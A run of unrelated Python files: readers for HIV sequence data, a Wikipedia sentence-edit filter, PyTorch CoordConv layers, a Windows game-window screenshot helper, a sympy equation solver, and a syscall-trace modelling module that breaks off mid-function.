        """Sample date parsed from ISO YYYY-MM-DD."""
        return datetime.strptime(self._data['Date'], '%Y-%m-%d').date()

    @property
    def gene(self):
        """Gene this fragment covers."""
        return self._data['Gene']

    @property
    def first_aa(self):
        """First covered amino-acid position (inclusive)."""
        return int(self._data['FirstAA'])

    @property
    def last_aa(self):
        """Last covered amino-acid position (inclusive)."""
        return int(self._data['LastAA'])

    @property
    def na_sequence(self):
        """Nucleotide sequence spanning first_aa..last_aa."""
        return self._data['NASequence']

    def iter_codons(self, start_aa=None, end_aa=None, frameshift=0):
        """Yield a Codon for each covered position.

        Arguments:
            start_aa / end_aa: optional inclusive position bounds
                (falsy values disable the corresponding bound).
            frameshift: nucleotide offset applied when slicing triplets.
        """
        cons = CONSENSUS[self.gene]['AASeq']
        fs = frameshift
        for i in range(0, self.last_aa - self.first_aa + 1):
            aa_pos = i + self.first_aa
            if (start_aa and aa_pos < start_aa) or \
                    (end_aa and aa_pos > end_aa):
                continue
            # Slice this position's codon, shifted by the frameshift.
            triplet = self.na_sequence[i * 3 + fs:i * 3 + 3 + fs]
            # Consensus positions are 1-based; the string is 0-based.
            cons_aa = cons[aa_pos - 1]
            yield Codon(
                position=aa_pos,
                gene=self.gene,
                triplet=triplet,
                cons_aa=cons_aa)
class Sample:
    """One patient sample row (metadata only, no sequence)."""

    def __init__(self, sample_data):
        # sample_data: csv.DictReader row from internalFiles/samples.csv.
        self._data = sample_data

    @property
    def pid(self):
        """Patient identifier."""
        return self._data['PID']

    @property
    def time_point(self):
        """Sampling time point label."""
        return self._data['TimePoint']

    @property
    def date(self):
        """Sample date parsed from ISO YYYY-MM-DD."""
        return datetime.strptime(self._data['Date'], '%Y-%m-%d').date()

    @property
    def category(self):
        """Sample category label."""
        return self._data['Category']
def data_reader(filepath, decorator=dict, filter_func=None, delimiter=','):
    """Yield rows of a (possibly BOM-prefixed) delimited file.

    Each csv.DictReader row is passed through *decorator*, and yielded
    only when *filter_func* (if given) accepts it.
    """
    with open(filepath) as fp:
        # Skip a UTF-8 BOM when present; otherwise rewind to the start.
        if fp.read(1) != '\ufeff':
            fp.seek(0)
        for row in csv.DictReader(fp, delimiter=delimiter):
            decorated = decorator(row)
            if not filter_func or filter_func(decorated):
                yield decorated
def sequence_reader(filter_func=None):
    """Iterate Sequence records from internalFiles/sequences.csv."""
    path = os.path.join(ROOT, 'internalFiles', 'sequences.csv')
    return data_reader(path, Sequence, filter_func)
def possible_apobecs_reader(gene, filter_func=None):
    """Iterate possible-APOBEC rows for *gene*; empty when no file exists."""
    filename = os.path.join(
        ROOT, 'data', 'naiveStudies', 'apobec',
        '{}PossibleApobecs.csv'.format(gene.lower()))
    if os.path.exists(filename):
        return data_reader(filename, filter_func=filter_func)
    return []
def sample_reader(filter_func=None):
    """Iterate Sample records from internalFiles/samples.csv."""
    path = os.path.join(ROOT, 'internalFiles', 'samples.csv')
    return data_reader(path, Sample, filter_func)
def naive_sequence_reader(gene, filter_func=None):
    """Iterate naive-study rows for *gene* as plain dicts."""
    path = os.path.join(
        ROOT, 'internalFiles', 'naiveStudies',
        '{}.csv'.format(gene.lower()))
    return data_reader(path, filter_func=filter_func)
def fasta_reader(gene, rx):
    """Iterate (header, sequence) pairs of the aligned FASTA for gene/rx."""
    filename = os.path.join(
        ROOT, 'internalFiles', 'fasta',
        '{}{}.aln.fasta.txt'.format(gene, rx))
    return any_fasta_reader(filename)
def any_fasta_reader(filename):
    """Yield (header, sequence) pairs from a FASTA file, skipping '#' comments."""
    header, chunks = None, []
    with open(filename) as fp:
        for raw in fp:
            if raw.startswith('#'):
                continue
            if raw.startswith('>'):
                # Flush the previous record before starting a new one.
                if chunks:
                    yield header, ''.join(chunks)
                header = raw[1:].strip()
                chunks = []
            else:
                chunks.append(raw.strip())
    # Flush the trailing record, if any.
    if chunks:
        yield header, ''.join(chunks)
|
# -*- coding: utf-8 -*-
from wikiedits.diff_finder import DiffFinder
import nltk.data
import Levenshtein
import math
import logging
log = logging.getLogger(__name__)
class EditFilter(object):
    """Decides which old/new text pairs constitute genuine sentence edits.

    The two fragments are segmented into sentences; aligned sentence pairs
    are kept when their word-count difference and word-level Levenshtein
    ratio fall under the configured thresholds.
    """

    def __init__(self,
                 lang='english',
                 min_words=3,
                 max_words=120,
                 length_diff=4,
                 edit_ratio=0.3,
                 min_chars=10):
        # Punkt sentence segmenter for the requested language.
        self.segmenter = nltk.data.load('tokenizers/punkt/%s.pickle' % lang)
        self.LEVENSHTEIN_RATIO_LOG_BASE = 20
        self.MIN_TEXT_LENGTH = min_chars  # in characters
        self.MIN_WORDS_IN_SENTENCE = min_words  # in words
        self.MAX_WORDS_IN_SENTENCE = max_words  # in words
        self.MAX_LENGTH_DIFF = length_diff  # on words
        self.MAX_LEVENSHTEIN_RATIO = edit_ratio  # on words

    def filter_edits(self, old_text, new_text):
        """Return [(old_sent, new_sent, (ratio, dist)), ...] for sentence
        pairs that look like genuine edits; [] when the texts don't qualify."""
        log.debug("processing texts:\n >>> %s\n >>> %s", old_text, new_text)
        if not self.__looks_like_text_edition(old_text, new_text):
            return []
        edits = []
        for old_sent, new_sent in self.__sentence_pairs(old_text, new_text):
            old_sent = old_sent.strip()
            new_sent = new_sent.strip()
            log.info("processing sentences:\n > %s\n > %s",
                     old_sent, new_sent)
            # scores is False (rejected) or a (ratio, dist) tuple.
            scores = self.__looks_like_sentence_edition(old_sent, new_sent)
            if not scores:
                continue
            edits.append((old_sent, new_sent, scores))
        log.info("got %i edited sentence(s)", len(edits))
        return edits

    def __looks_like_text_edition(self, old_text, new_text):
        """Cheap fragment-level rejection: empty, identical or too short."""
        if not old_text or not new_text:
            log.debug("either old or new text fragment is empty")
            return False
        if old_text == new_text:
            log.debug("texts are equal")
            return False
        if len(old_text) < self.MIN_TEXT_LENGTH \
                or len(new_text) < self.MIN_TEXT_LENGTH:
            log.debug("either old or new text fragment is too short")
            return False
        return True

    def __looks_like_sentence_edition(self, old_sent, new_sent):
        """Return (ratio, dist) when the pair passes all thresholds,
        otherwise False."""
        if old_sent == new_sent:
            log.info("sentences are equal")
            return False
        # the number of words in a sentence is obtained by counting the number
        # of spaces plus one
        counts = [old_sent.count(' ') + 1, new_sent.count(' ') + 1]
        diff = abs(counts[0] - counts[1])
        if diff > self.MAX_LENGTH_DIFF:
            log.info("too large difference in number of words %i", diff)
            return False
        if min(counts) < self.MIN_WORDS_IN_SENTENCE:
            log.info("shorter sentence has too few words")
            return False
        if max(counts) > self.MAX_WORDS_IN_SENTENCE:
            log.info("longer sentence has too many words")
            return False
        ratio, dist = self.__levenshtein_ratio(old_sent, new_sent)
        if ratio > self.MAX_LEVENSHTEIN_RATIO:
            log.info("too high levensthein ratio %.2f", ratio)
            return False
        return (ratio, dist)

    def __sentence_pairs(self, old_frag, new_frag):
        """Pair sentences positionally (index i with index i), truncating to
        the shorter fragment, with whitespace normalized."""
        old_sents = self.__segmentize(old_frag)
        new_sents = self.__segmentize(new_frag)
        min_size = min(len(old_sents), len(new_sents))
        for idx in range(min_size):
            yield (' '.join(old_sents[idx].split()),
                   ' '.join(new_sents[idx].split()))

    def __segmentize(self, text):
        """Split into Punkt sentences, then further on '; ' separators."""
        return [frag
                for sent in self.segmenter.tokenize(text)
                for frag in sent.split('; ')]

    def __levenshtein_ratio(self, old_sent, new_sent):
        """Word-level edit distance normalized by the shorter sentence length
        and damped by a logarithm of that length."""
        old_words = old_sent.split()
        new_words = new_sent.split()
        min_words = min(len(old_words), len(new_words))
        dist = self.__levenshtein_on_words(old_words, new_words)
        ratio = dist / float(min_words) * math.log(min_words,
                                                   self.LEVENSHTEIN_RATIO_LOG_BASE)
        return (ratio, dist)

    def __levenshtein_on_words(self, words1, words2):
        """Word-level Levenshtein distance, computed by mapping each distinct
        word to one character and diffing the resulting strings.

        NOTE(review): chr((char % 93) + 33) cycles after 93 distinct words,
        so extremely word-rich pairs can map two words to the same character
        and slightly under-count the distance - confirm this is acceptable
        given MAX_WORDS_IN_SENTENCE.
        """
        char = 32  # 32 + 33 = 'A'
        word_map = {}
        for word in set(words1 + words2):
            word_map[word] = chr((char % 93) + 33)
            char += 1
        list1 = ''.join([word_map[word] for word in words1])
        list2 = ''.join([word_map[word] for word in words2])
        return Levenshtein.distance(list1, list2)
|
import torch
from torch import nn
class add_coord(nn.Module):
    """Append normalized x/y coordinate channels to a feature map (CoordConv)."""

    def __init__(self):
        super(add_coord, self).__init__()

    def forward(self, x):
        """x: (bs, ch, h, w) -> (bs, ch + 2, h, w), coords in [-1, 1)."""
        bs, ch, h, w = x.size()
        # torch.arange(n) replaces the deprecated torch.range(0, n - 1):
        # identical values without the deprecation warning. float32 matches
        # torch.range's former default dtype.
        h_coord = torch.arange(h, dtype=torch.float32).unsqueeze(0).unsqueeze(0).unsqueeze(-1).repeat([bs, 1, 1, w]) / (
            h / 2) - 1
        w_coord = torch.arange(w, dtype=torch.float32).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat([bs, 1, h, 1]) / (
            w / 2) - 1
        x = torch.cat([x, h_coord, w_coord], dim=1)
        return x
class Coord2d(nn.Module):
    """2-D convolution preceded by CoordConv coordinate-channel injection."""

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
        """Same signature as nn.Conv2d; two coordinate channels are added
        internally, so the wrapped convolution consumes in_channels + 2."""
        super(Coord2d, self).__init__()
        self.add_coord = add_coord()
        self.conv = nn.Conv2d(
            in_channels=in_channels + 2,
            out_channels=out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            dilation=dilation,
            groups=groups,
            bias=bias,
        )

    def forward(self, x):
        """Append coordinate channels, then convolve."""
        return self.conv(self.add_coord(x))
def MiniBatchDiscrimination(x):
    """Mini-batch diversity term for a GAN discriminator.

    :param x: projected (bs, hs) tensor
    :return: tensor of size (bs, hs)
    """
    bs = x.size(0)
    # Broadcast x into pairwise form and take the negated sum, over the
    # batch axis, of (row_j - row_i) differences per feature.
    lhs = x.unsqueeze(0).repeat([bs, 1, 1])
    rhs = x.unsqueeze(-1).repeat([1, 1, bs]).permute(0, 2, 1)
    return -(lhs - rhs).sum(1)
|
import win32gui
from PIL import ImageGrab
import math
import sys
def getTopWindowList():
    """Enumerate visible, enabled top-level windows as [title, class] pairs."""
    root = win32gui.GetDesktopWindow()
    # NOTE(review): `root` is unused; EnumWindows already walks all
    # top-level windows of the desktop.
    children = []
    def callback(hwnd, extra):
        try:
            if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):
                children.append(
                    [win32gui.GetWindowText(hwnd), win32gui.GetClassName(hwnd)] )
        except:
            # Win32 calls can fail for transient windows; log and continue.
            print(sys.exc_info()[0])
        # Returning True keeps the enumeration going.
        return True
    try:
        win32gui.EnumWindows( callback, 0 )
    except:
        print(sys.exc_info()[0])
    return children
def getImageWith(param):
    """Capture the game window, cropped to the message region when enabled."""
    region = param.message_fix_region if param.valid_message_fix_region else None
    return getImageOf(param.game_window_title, param.game_window_class, region)
def getImageOf(window_title, window_class, region):
    """Screenshot the given window, optionally cropped to a sub-region.

    *region* is (left, top, right, bottom) relative to the window; when
    falsy, the whole window rectangle is returned.
    """
    rect = getRectOf(window_title, window_class)
    screenshot = ImageGrab.grab()
    if not region:
        return screenshot.crop(rect)
    left, top, right, bottom = region
    # Translate the window-relative region into screen coordinates.
    return screenshot.crop((left + rect[0], top + rect[1],
                            right + rect[0], bottom + rect[1]))
def getHandle(window_title, window_class):
    """Resolve a window handle; blank title/class act as wildcards (None)."""
    window_class = window_class.strip() or None
    window_title = window_title.strip() or None
    return win32gui.FindWindow(window_class, window_title)


def getRectOf(window_title, window_class):
    """Return (left, top, right, bottom) of the matched window."""
    return win32gui.GetWindowRect(getHandle(window_title, window_class))


if __name__ == '__main__':
    getTopWindowList()
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys, time, re
from sympy.solvers import solve
from sympy import Symbol
def resolve(equation):
    '''Resolve an equation with 1 unknown var'''
    # The unknown is the first alphabetic token found in the equation.
    token_re = re.compile(r"([A-Za-z]{0,})")
    symbol = ''
    for candidate in token_re.findall(equation):
        if candidate:
            symbol = candidate
            break
    x = Symbol(symbol)
    # Insert the implicit multiplication sign: "3x" -> "3*x".
    equation = re.sub(r'([0-9])' + symbol, r'\1*' + symbol, equation)
    # Split on '=' and move everything to the left: a = b  ->  a - (b).
    sides_re = re.compile(r"(.{0,})\=(.{0,})")
    lhs, rhs = sides_re.findall(equation)[0]
    return solve(lhs + '-(' + rhs + ')', x)
# CLI entry point: the equation is the first argument, e.g. "2x + 4 = 10".
eq = sys.argv[1]
print(resolve(eq))
|
import IPython
import pickle
import numpy as np
import matplotlib.pyplot as plt
import re
import stat
import os
import sys
import random
from functools import reduce
from pathlib import Path
import nwalign as nw
from interruptingcow import timeout
from .classes import *
from .decorators import *
from .utils import *
## Declaring global objects
# Matches strace signal-delivery lines such as "--- SIGCHLD {...} ---".
signal_regex = re.compile(r"--- SIG.* ---")
# Matches the sigreturn syscall emitted after a signal handler runs.
return_regex = re.compile(r"rt_sigreturn")
# Syscalls treated as noise when comparing traces.
noisy_syscalls = ('futex', 'madvise', 'clock_gettime', 'sched_yield')
def all_symbols_for_api(kb, api):
    """Collect every call name appearing in any pruned trace of *api*."""
    symbols = set()
    for raw_trace in kb[api]:
        for _tag, name in prune_syscalls_args(raw_trace):
            symbols.add(name)
    return symbols
def traverse(d, api, visited=None):
    """Return True when *api* reaches at least one syscall, directly or via
    its sub-APIs. Memoised through ``traverse.cache``, which callers
    (e.g. find_no_indirect_sys) must initialise before the first call."""
    if api in traverse.cache:
        return traverse.cache[api]
    if visited is None:
        visited = set()
    # Avoid infinite recursion. Fallback to False, this should be safe
    if api in visited:
        return False
    visited |= set([api])
    if api not in d:
        traverse.cache[api] = False
        return False
    realizations = d[api]
    ret = False  # NOTE(review): never read — leftover from an earlier version
    # Direct syscalls in any realization settle the question immediately.
    for r in realizations:
        sys = get_syscall_list_from_trace(r)
        if len(sys) != 0:
            visited -= set([api])
            traverse.cache[api] = True
            return True
    # Otherwise recurse into the union of sub-APIs across realizations.
    subapis = set()
    for r in realizations:
        subapis |= set(get_api_list_from_trace(r))
    for subapi in subapis:
        if traverse(d, subapi, visited):
            visited -= set([api])
            traverse.cache[api] = True
            return True
    visited -= set([api])
    traverse.cache[api] = False
    return False
def childs_are_weak_polymorph(d, api, visited=None):
    """Return True when some sub-API of *api* is polymorphic, or transitively
    has a polymorphic descendant. Memoised via the function attribute
    ``cache``, reset by find_weak_polymorph before a full scan."""
    if api in childs_are_weak_polymorph.cache:
        return childs_are_weak_polymorph.cache[api]
    if visited is None:
        visited = set()
    # Avoid infinite recursion. Fallback to False, this should be safe
    if api in visited:
        return False
    visited |= set([api])
    if api not in d:
        childs_are_weak_polymorph.cache[api] = False
        return False
    realizations = d[api]
    ret = False  # NOTE(review): never read — leftover from an earlier version
    # Union of sub-APIs referenced by any realization of this API.
    subapis = set()
    for r in realizations:
        subapis |= set(get_api_list_from_trace(r))
    for subapi in subapis:
        if is_polymorphic(d, subapi):
            visited -= set([api])
            childs_are_weak_polymorph.cache[api] = True
            return True
        if is_leaf(d, subapi):
            # Leaf and monomorphic: nothing deeper to inspect.
            continue
        if childs_are_weak_polymorph(d, subapi, visited):
            visited -= set([api])
            childs_are_weak_polymorph.cache[api] = True
            return True
    visited -= set([api])
    childs_are_weak_polymorph.cache[api] = False
    return False
def is_weak_polymorph(d, api):
    """Polymorphic itself, or a non-leaf with a (transitively) polymorphic child."""
    return is_polymorphic(d, api) or (
        not is_leaf(d, api) and childs_are_weak_polymorph(d, api))


def is_leaf(d, api):
    """True when no realization of *api* calls into another API."""
    for realization in d[api]:
        if any(call[0] == 'API' for call in realization):
            return False
    return True


def find_leaves(d):
    """All APIs whose realizations contain no API calls at all."""
    return {api for api in d if is_leaf(d, api)}
def realizations_are_equals(r1, r2):
    """Element-wise equality of two realizations after argument pruning."""
    pruned_a = prune_syscalls_args(r1)
    pruned_b = prune_syscalls_args(r2)
    # List equality already compares lengths first, then each element.
    return pruned_a == pruned_b


def is_polymorphic(d, api):
    """True when at least two consecutive realizations of *api* differ."""
    realizations = d[api]
    return any(not realizations_are_equals(first, second)
               for first, second in zip(realizations, realizations[1:]))
def realization_is_empty(r):
    """True when the realization contains no calls at all."""
    return not r


def is_empty(d, api):
    """True when every realization of *api* is empty."""
    return all(realization_is_empty(r) for r in d[api])
def realization_makes_syscalls(r):
    """True when the realization contains at least one direct syscall entry."""
    return any(call[0] == "SYS" for call in r)


def makes_syscalls(d, api):
    """True when any realization of *api* performs a direct syscall."""
    return any(realization_makes_syscalls(r) for r in d[api])
def has_indirect_sys(d, api):
    # An API "has indirect syscalls" when a syscall is reachable through
    # its (transitive) sub-API calls; traverse() does the actual walk.
    return traverse(d, api)
def find_polymorph(d):
    """All APIs with at least two differing realizations."""
    return {api for api in d if is_polymorphic(d, api)}


def find_weak_polymorph(d):
    """All weakly polymorphic APIs; resets the helper's memo before scanning."""
    childs_are_weak_polymorph.cache = {}
    return {api for api in d if is_weak_polymorph(d, api)}


def find_empties(d):
    """All APIs whose every realization is empty."""
    return {api for api in d if is_empty(d, api)}


def find_no_syscall_apis(d):
    """All APIs that never perform a direct syscall."""
    return {api for api in d if not makes_syscalls(d, api)}


def find_no_indirect_sys(d):
    """All APIs with neither direct nor indirect syscalls; resets traverse's memo."""
    traverse.cache = {}
    return {api for api in d if not has_indirect_sys(d, api)}
def measures(leaves, polymorph, no_sys, no_ind_sys,
             no_leaves, monomorph, sys, ind_sys):
    """Print the size of each bucket in the API classification grid.

    NOTE: the `sys` parameter shadows the stdlib module name but is part
    of the established call signature, so it is kept.
    """
    buckets = [
        ("0Sys/0API/Polymorph", no_sys & leaves & polymorph),
        ("0Sys/0API/No-Polymorph", no_sys & leaves & monomorph),
        ("1+Sys/0API/Polymorph", sys & leaves & polymorph),
        ("1+Sys/0API/No-Polymorph", sys & leaves & monomorph),
        ("0Sys/1+API/Polymorph", no_sys & no_leaves & polymorph),
        ("0Sys/1+API/No-Polymorph", no_sys & no_leaves & monomorph),
        ("1+Sys/1+API/Polymorph", sys & no_leaves & polymorph),
        ("1+Sys/1+API/No-Polymorph", sys & no_leaves & monomorph),
        ("0Ind_Sys/0API/Polymorph", no_ind_sys & leaves & polymorph),
        ("0Ind_Sys/0API/No-Polymorph", no_ind_sys & leaves & monomorph),
        ("1+Ind_Sys/0API/Polymorph", ind_sys & leaves & polymorph),
        ("1+Ind_Sys/0API/No-Polymorph", ind_sys & leaves & monomorph),
        ("0Ind_Sys/1+API/Polymorph", no_ind_sys & no_leaves & polymorph),
        ("0Ind_Sys/1+API/No-Polymorph", no_ind_sys & no_leaves & monomorph),
        ("1+Ind_Sys/1+API/Polymorph", ind_sys & no_leaves & polymorph),
        ("1+Ind_Sys/1+API/No-Polymorph", ind_sys & no_leaves & monomorph),
        ("0Sys/1+IndSys/Polymorph", no_sys & ind_sys & polymorph),
        ("0Sys/1+IndSys/No-Polymorph", no_sys & ind_sys & monomorph),
    ]
    for label, bucket in buckets:
        print(label + ": " + str(len(bucket)))
def build_precise_model_for_api(d, api, strong_monomorph):
    """Flatten the first realization of a strong-monomorph API into a list
    of syscalls, recursively inlining sub-API models. Memoised via the
    ``cache`` attribute, reset by build_precise_models."""
    if api in build_precise_model_for_api.cache:
        return build_precise_model_for_api.cache[api]
    model = []
    # Monomorph APIs have identical realizations, so the first one suffices.
    realization = d[api][0]
    for call in realization:
        if call[0] == 'SYS':
            # Keep the syscall unless it is allocator/scheduler noise or a
            # SIGCHLD delivery line.
            if (get_syscall_name(call[1]) not in ("futex", "madvise")
                    and not call[1].startswith("--- SIGCHLD")):
                model.append(call)
            continue
        # Sub-API calls must themselves be strong monomorph to inline.
        assert call[1] in strong_monomorph, (
            "%s supposed to be strong monomorph, but it's not" % call[1])
        model += build_precise_model_for_api(d, call[1], strong_monomorph)
    build_precise_model_for_api.cache[api] = model
    return model
def build_precise_models(d, strong_monomorph):
    """Build the precise (flattened) model of every strong-monomorph API."""
    build_precise_model_for_api.cache = {}
    return {api: build_precise_model_for_api(d, api, strong_monomorph)
            for api in strong_monomorph}
def prune_malloc_syscalls(trace, entry_offset=0):
    """Strip the allocator's arena-management pattern (anonymous mmap
    named "libc_malloc" by prctl, optionally followed by one or two
    munmaps of the same region) from *trace*.

    Each call is a tuple with its kind tag at index ``entry_offset`` and
    its text at ``entry_offset + 1``. Returns a new pruned list.
    """
    # Compile the patterns once and stash them on the function object.
    if not hasattr(prune_malloc_syscalls, "mmap_regex"):
        mmap_regex = re.compile(r"mmap2?\(.*PROT_READ\|PROT_WRITE," +
                                r" MAP_PRIVATE\|MAP_ANONYMOUS\|MAP_NORESERVE," +
                                r" -1, 0.*= (0x[a-f\d]+)")
        prune_malloc_syscalls.mmap_regex = mmap_regex
        prctl_regex = re.compile(r"prctl\(PR_SET_VMA," +
                                 r" PR_SET_VMA_ANON_NAME, (0x[a-f\d]+).*" +
                                 r"\"libc_malloc\".*")
        prune_malloc_syscalls.prctl_regex = prctl_regex
        munmap_regex = re.compile(r"munmap\((0x[a-f\d]+),.*\)")
        prune_malloc_syscalls.munmap_regex = munmap_regex
    ret = []
    skip = 0  # how many upcoming calls belong to a matched pattern
    l = len(trace) - 1
    for i, call in enumerate(trace):
        if skip != 0:
            skip -= 1
            continue
        if call[0+entry_offset] == "API":
            ret.append(call)
            continue
        m1 = prune_malloc_syscalls.mmap_regex.match(call[1+entry_offset])
        if i < l and m1:
            # mmap immediately followed by a prctl naming the same address
            # "libc_malloc": allocator bookkeeping, not app behaviour.
            m2 = prune_malloc_syscalls.prctl_regex.match(trace[i+1][1+entry_offset])
            if m2 and m2.groups()[0] == m1.groups()[0]:
                skip = 1
                if i < l-1:
                    # Optionally the region is unmapped right away...
                    m3 = prune_malloc_syscalls.munmap_regex.match(
                        trace[i+2][1+entry_offset])
                    if m3 and m1.groups()[0] == m3.groups()[0]:
                        skip += 1
                        # ...sometimes with a second trailing munmap.
                        if i < l - 2 and 'munmap' in trace[i+3][1+entry_offset]:
                            skip += 1
                continue
        ret.append(call)
    return ret
## Recursively try to build precise model for an API and its sub-API
def try_build_precise_model_for_api(d, api, models, visited=None):
    """Attempt to derive a precise model for *api* by flattening each
    realization; succeeds only when all flattened realizations agree.
    Returns the model or None. Memoised via the ``cache`` attribute,
    reset by find_implicit_monomorph_models."""
    if api in try_build_precise_model_for_api.cache:
        return try_build_precise_model_for_api.cache[api]
    if visited is None:
        visited = set()
    # Avoid infinite recursion. Fallback to False, this should be safe
    if api in visited:
        # Raising here makes the caller skip the realization (see except below).
        raise Exception()
    visited.add(api)
    if api in models:
        try_build_precise_model_for_api.cache[api] = models[api]
        visited -= set([api])
        return models[api]
    possible_models = []
    for realization in d[api]:
        try:
            pm = []
            for call in realization:
                if call[0] == 'SYS':
                    # Drop scheduler noise and SIGCHLD delivery lines.
                    if (get_syscall_name(call[1]) not in ("futex", "madvise")
                            and not call[1].startswith('--- SIGCHLD')):
                        pm.append(call)
                    continue
                if call[1] in models:
                    pm += models[call[1]]
                    continue
                ## Try to build the model for the sub-API
                subapi_model = try_build_precise_model_for_api(d, call[1],
                                                               models, visited)
                if subapi_model is not None:
                    pm += subapi_model
                else:
                    visited -= set([api])
                    try_build_precise_model_for_api.cache[api] = None
                    return None
        except Exception:
            # Recursion cycle in this realization: try the next one.
            continue
        possible_models.append(pm)
    ret = None
    if len(possible_models) == 0:
        # NOTE(review): this early return leaves *api* in `visited` and
        # skips the cache update, unlike every other exit path — confirm
        # whether that is intentional.
        return ret
    # All flattened realizations must be equal for the model to be precise.
    for i in range(len(possible_models) - 1):
        if not realizations_are_equals(possible_models[i],
                                       possible_models[i+1]):
            break
    else:
        ret = possible_models[0]
    visited -= set([api])
    try_build_precise_model_for_api.cache[api] = ret
    return ret
def find_implicit_monomorph_models(d, models):
    """Extend *models* with APIs whose precise model can be derived transitively."""
    extended = dict(models)
    try_build_precise_model_for_api.cache = {}
    for api in d:
        derived = try_build_precise_model_for_api(d, api, models)
        if derived is not None:
            extended[api] = derived
    return extended
def check_0sys(no_sys, no_ind_sys):
    """Sanity: APIs without indirect syscalls must also lack direct ones."""
    assert set(no_ind_sys) <= set(no_sys)


def check_polymorph(weak_polymorph, polymorph):
    """Sanity: every polymorphic API is also weakly polymorphic."""
    assert polymorph <= weak_polymorph


def check_empties_have_precise_model(empties, precise_models):
    """Sanity: every empty API received a precise model."""
    assert empties <= set(precise_models.keys())


def check_implicit_precise_models(implicit_precise_models, precise_models):
    """Sanity: the implicit model set extends the explicit one."""
    assert set(implicit_precise_models.keys()) >= set(precise_models.keys())


def check_empties_have_empty_model(empties, empty_models):
    """Sanity: every empty API has an empty model."""
    assert empties <= empty_models
def api_syscall_in_regex(reg):
    """Collect the first element (API/syscall name) of every regex entry."""
    return {entry[0] for entry in reg}
def symbols_generator(dictionary=None, start=0):
    """Build and memoise the (char -> name, name -> char) translation
    tables used to encode traces as strings. The first call must supply
    *dictionary*; later calls return the cached pair regardless of args."""
    if hasattr(symbols_generator, "_symbols"):
        return symbols_generator._symbols
    assert dictionary is not None, "Needs a dict to generate the symbols"
    symbols_set = set(dictionary)
    indexes = [x for x in range(start, start+len(symbols_set))]
    symbols = []
    symbols.append({chr(i): x
                    for i, x in zip(indexes, symbols_set)})
    # Regex metacharacters must map to themselves so encoded strings stay
    # valid patterns; any name that landed on one is moved to a fresh char.
    forbidden = [c for c in list('$()*+-.?[\\]^|')]
    for c in forbidden:
        if c in symbols[0].keys():
            symb = symbols[0][c]
            symbols[0][c] = c
            new_symb = chr(indexes[-1] + 1)
            symbols[0][new_symb] = symb
            indexes.append(indexes[-1] + 1)
        else:
            symbols[0][c] = c
    # Reverse table: name -> char.
    symbols.append({y: x for x, y in symbols[0].items()})
    ret = (symbols[0], symbols[1])
    setattr(symbols_generator, "_symbols", ret)
    return ret
def encode_regex(regex, symbols=None):
    """Translate each regex entry's name(s) into the single-char alphabet,
    normalising every payload to a set of encoded characters."""
    if symbols is None:
        symbols = symbols_generator()[1]
    encoded = []
    for payload, flag in regex:
        if type(payload) == str:
            encoded.append(({symbols[payload]}, flag))
        else:
            encoded.append(({symbols[name] for name in payload}, flag))
    return encoded
def encode_regex_str(regex, symbols=None):
    """Render the positional regex as an anchored pattern string, mapping
    OPTIONAL/MULTIPLE flags onto the ?, + and * quantifiers."""
    if symbols is None:
        symbols = symbols_generator()[1]
    pieces = [u"^"]
    for payload, flag in regex:
        if type(payload) == str:
            pieces.append(symbols[payload])
        else:
            # Alternatives become an explicit (a|b|...) group.
            pieces.append(u'(' + u'|'.join([symbols[p] for p in payload]) + u')')
        if flag == RegexFlags.OPTIONAL:
            pieces.append(u'?')
        elif flag == RegexFlags.MULTIPLE:
            pieces.append(u'+')
        elif flag == RegexFlags.OPTIONAL | RegexFlags.MULTIPLE:
            pieces.append(u'*')
    pieces.append(u'$')
    return u''.join(pieces)
def encode_trace(trace, symbols=None):
    """Encode a pruned trace as a string over the single-char alphabet;
    calls without a known symbol are silently dropped."""
    if symbols is None:
        symbols = symbols_generator()[1]
    pruned = prune_syscalls_args(trace)
    return u"".join(symbols[call[1]] for call in pruned if call[1] in symbols)
def decode_sequence(seq, symbols=None):
    """Translate an encoded string back into the list of call names."""
    if symbols is None:
        symbols = symbols_generator()[0]
    return [symbols[ch] for ch in seq]
def decode_regex(reg, symbols):
    """Translate an encoded regex back to call names; singleton sets
    collapse to a bare string."""
    decoded = []
    for calls, flag in reg:
        if len(calls) == 1:
            # NOTE: .pop() mutates the caller's set, matching the original contract.
            decoded.append((symbols[calls.pop()], flag))
        else:
            decoded.append(({symbols[c] for c in calls}, flag))
    return decoded
def decode_regex_str(reg, symbols=None):
    """Parse an encoded, anchored pattern string back into a RegexSequence
    tree (with RegexAlternative / RegexSimple nodes), recursing into
    parenthesised groups."""
    if symbols is None:
        symbols = symbols_generator()[0]
    l = list(reg)
    ret = RegexSequence()
    sequences = []  # stack of partially-collected group bodies
    cnt = 0         # current parenthesis nesting depth
    i = -1
    ## Skip the initial ^ character, if any
    if l[0] == '^':
        i += 1
    i_max = len(l)
    ## Do not consider the final $ character, if any
    if l[i_max-1] == '$':
        i_max -= 1
    while i < i_max-1:
        i += 1
        entry = ...  # sentinel; overwritten in the plain-symbol branch below
        curr = l[i]
        if curr == u'(': ## Begin of a sequence or an alternative
            if cnt == 0:
                sequences.append(u'')
            else:
                # Nested group: keep accumulating into the open body.
                tmp = sequences.pop()
                tmp += curr
                sequences.append(tmp)
            cnt += 1
            continue
        elif curr == u')': ## End of a sequence or an alternative
            cnt -= 1
            if cnt != 0:
                tmp = sequences.pop()
                tmp += curr
                sequences.append(tmp)
                continue
            # Top-level group closed: decide alternative vs sub-sequence.
            inside = sequences.pop()
            alternatives = inside.split('|')
            if len(alternatives) > 1:
                alt_obj = RegexAlternative()
                for alt in alternatives:
                    if len(alt) == 1:
                        alt_obj.add(RegexSimple(symbols[alt]))
                    elif len(alt) == 2 and alt[1] in '+?*':
                        alt_obj.add(RegexSimple(symbols[alt[0]],
                                    RegexFlags.from_regex_modifier(alt[1])))
                    else:
                        ## Got a new sequence here!
                        alt_obj.add(decode_regex_str(alt, symbols))
                # A quantifier right after ')' applies to the whole group.
                if i < i_max-1 and l[i+1] in '+?*':
                    ret.add(alt_obj, RegexFlags.from_regex_modifier(l[i+1]))
                    i += 1
                else:
                    ret.add(alt_obj)
            else:
                new_seq = decode_regex_str(inside, symbols)
                if i < i_max-1 and l[i+1] in '*?+':
                    new_seq.flag = RegexFlags.from_regex_modifier(l[i+1])
                    i += 1
                ret.add(new_seq)
            continue
